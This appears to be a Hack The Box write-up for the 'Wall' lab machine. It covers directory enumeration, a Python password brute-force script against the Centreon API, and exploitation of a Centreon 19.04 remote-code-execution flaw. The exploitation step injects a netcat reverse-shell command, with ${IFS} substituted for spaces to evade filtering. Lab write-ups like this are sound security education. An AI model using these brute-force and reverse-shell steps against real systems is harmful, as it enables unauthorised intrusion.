Wall HTB Writeup
Wall 🧱
From port scanning two ports are only available 22,80
All I see in this port is the default page of apache2. So I fire up gobuster at this time.
gobuster dir -w /usr/share/wordlists/directory-list-2.3-medium.txt -u -o port80
, which gives me back:
/monitoring (401)
visiting /monitoring gives me a basic auth form, but I don’t know any logins,atm. So I run another gobuster but this time with .php extension.
gobuster dir -w /usr/share/wordlists/directory-list-2.3-medium.txt -u -o port80withphp -x .php
gives me back:
- aa.php === 1
- panel.php === just a test for php file !
But again nothing of interest. I tried to brute force the /monitoring directory by using hydra even tho I didn’t knew a single username, but again i failed to find something.
I open the request to /monitoring using burp and change the request from GET /monitoring/
to POST /monitoring/
I get a redirect which sends me to /monitoring/'/centreon'
We have a new directory: /centreon/
I search and find that I can use their api to send authentication requests, and at this time I create a script to do that for me:
import requests
URL = ""
with open('/home/fuxsocy/.local/share/Trash/files/rockyou.txt', 'r') as f:
for i in f:
i = i.strip('\n')
PARAMS = {"username":"Admin", "password": i}
r = requests.post(url = URL, data=PARAMS)
if "Bad" in r.text:
print("Found password: %s" % i)
The password is password1
(Don’t ever use this as password PLEASE 😂).
I login using that password on the interface. Looking at the version I found out version 19.04 has a rce.
I follow this post https://shells.systems/centreon-v19-04-remote-code-execution-cve-2019-13024/.
Basically what you have to do to gain rce is to visit
and at the Monitoring Engine Binary put a command, like you do on a terminal and then visit
to get rce.
But putting nc -e /bin/bash {IP}, does not work. After trying I got it working by putting {$IFS}
instead of a space.
The Internal Field Separator (IFS) that is used for word splitting after expansion and to split lines into words with the read builtin command.
there is a screen vulnerability!